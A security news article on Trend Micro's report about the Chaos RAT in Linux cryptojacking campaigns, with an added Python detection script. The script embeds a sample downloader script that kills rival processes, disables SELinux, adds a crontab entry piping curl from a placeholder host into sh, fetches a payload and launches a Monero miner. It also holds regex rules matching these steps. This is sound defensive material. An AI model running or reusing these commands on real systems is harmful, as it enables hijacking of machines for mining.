The Chaos remote access tool (RAT) has been identified as a key component of a recent wave of cryptocurrency mining attacks on Linux systems, according to a report by Trend Micro security researchers.
In their findings, the researchers describe how threat actors are using the Chaos RAT to make their cryptojacking campaigns against Linux machines more effective. The tactic mirrors earlier campaigns, such as those run by TeamTNT, in which cloud computing instances were targeted for the same purpose.
The attack methodology involves a multi-phased approach, starting with the elimination of competing malware, security tools, and cloud middleware. Subsequently, the attackers establish persistence and execute payloads, often deploying a Monero (XMR) cryptocurrency miner as the final payload.
Trend Micro noted that the more sophisticated variants of these threats have proven able to infect a larger number of devices. In one case from November 2022, the researchers intercepted an attack that used the Chaos RAT, a tool built on an open-source project and more capable than the simple downloaders usually seen in such campaigns.
One notable aspect of the new wave of attacks is the decentralized hosting of downloader scripts and payloads in various locations. This strategy ensures the continuity and spread of the malicious campaign. The main server identified in these attacks was traced back to Russia.
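The phases described above (killing competing malware and security tooling, establishing persistence, fetching a payload from more than one host, and running a Monero miner) can be triaged from a captured downloader script with a few pattern rules. The following is an added example, not code from the Trend Micro report: it runs a per-line rule set over a constructed sample script and reports which phases are present and how many distinct download hosts it contacts. The sample script, its paths, the `cloud-agent.service` name and the RFC 5737 TEST-NET addresses are all placeholders, not real indicators of compromise.

```python
import re

# Constructed sample of a Linux downloader script, modelled on the phases the
# report describes (kill competitors, disable security tooling, persist, fetch
# the payload from more than one host, run a Monero miner). Paths, service
# names and TEST-NET addresses are placeholders, not real indicators.
SAMPLE_SCRIPT = """\
#!/bin/sh
pkill -9 -f /tmp/.x/miner
kill -9 $(pgrep -f /var/tmp/.cache/run) 2>/dev/null
systemctl stop cloud-agent.service
setenforce 0
crontab -l 2>/dev/null | { cat; echo "*/10 * * * * curl -fsSL http://203.0.113.10/dl.sh | sh"; } | crontab -
wget -q -O /tmp/.k/run http://203.0.113.25/x/run || curl -fsSL http://198.51.100.7/x/run -o /tmp/.k/run
chmod +x /tmp/.k/run
nohup /tmp/.k/run -o stratum+tcp://pool.example.test:3333 --coin monero >/dev/null 2>&1 &
"""

# One regex per attack phase. Hits are recorded per line so an analyst can
# jump straight to the offending command.
PHASE_RULES = {
    "kill_competitors": re.compile(r"\b(pkill|killall|kill\s+-9)\b"),
    "disable_security": re.compile(r"systemctl\s+(stop|disable)|setenforce\s+0|ufw\s+disable"),
    "persistence": re.compile(r"crontab\s+-|/etc/cron|/etc/rc\.local|systemctl\s+enable"),
    "remote_fetch": re.compile(r"\b(curl|wget)\b.*https?://"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash)\b"),
    "miner": re.compile(r"monero|\bxmr\b|stratum\+tcp|--donate-level|:3333\b", re.IGNORECASE),
}
# Host part of any http(s) URL; used to spot payloads spread over several hosts.
URL_HOST = re.compile(r"https?://([^\s/\"'|)]+)")


def triage_script(text):
    """Map each phase to the 1-based line numbers that matched, and collect
    the distinct download hosts the script contacts."""
    hits = {phase: [] for phase in PHASE_RULES}
    hosts = set()
    for lineno, line in enumerate(text.splitlines(), start=1):
        for phase, rule in PHASE_RULES.items():
            if rule.search(line):
                hits[phase].append(lineno)
        hosts.update(URL_HOST.findall(line))
    return hits, sorted(hosts)


def is_cryptojacking_chain(hits):
    """The full chain from the report: clear out rivals, persist, fetch a
    payload and mine. Disabling security tooling and multi-host hosting are
    reported separately because not every variant does them."""
    required = ("kill_competitors", "persistence", "remote_fetch", "miner")
    return all(hits[phase] for phase in required)


def report(text=SAMPLE_SCRIPT):
    """Summarise a script: phases seen (with line numbers), download hosts,
    whether hosting is spread over more than one host, and the verdict."""
    hits, hosts = triage_script(text)
    return {
        "phases": {phase: lines for phase, lines in hits.items() if lines},
        "download_hosts": hosts,
        "decentralized_hosting": len(hosts) > 1,
        "cryptojacking_chain": is_cryptojacking_chain(hits),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

The rules are deliberately coarse: they flag behaviour (killing processes, editing crontab, piping a download into a shell, speaking the stratum mining protocol) rather than any particular file name or address, so they keep working when the attacker rehosts the scripts, which is exactly the point of the decentralized hosting the report describes. On a real system the same function can be pointed at `/etc/cron*`, user crontabs and shell history.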
From a technical perspective, the Chaos RAT is a Go-compiled binary with a range of capabilities, including spawning reverse shells, downloading and uploading files, and capturing screenshots. Bundling a general-purpose RAT with what was previously simple mining malware gives the operators interactive control of infected hosts, and illustrates how the tactics of cloud-focused threat actors continue to evolve.
Trend Micro emphasized the importance of heightened vigilance from both organizations and individuals in light of these developments. The integration of a sophisticated RAT into crypto mining campaigns underscores the need for robust security measures to combat evolving threats.
The release of Trend Micro’s advisory coincides with a recent security incident at Moola Market, a decentralized finance platform that suffered losses of up to $9 million in cryptocurrency. This serves as a stark reminder of the vulnerabilities in the crypto space and the ongoing efforts of threat actors to exploit them.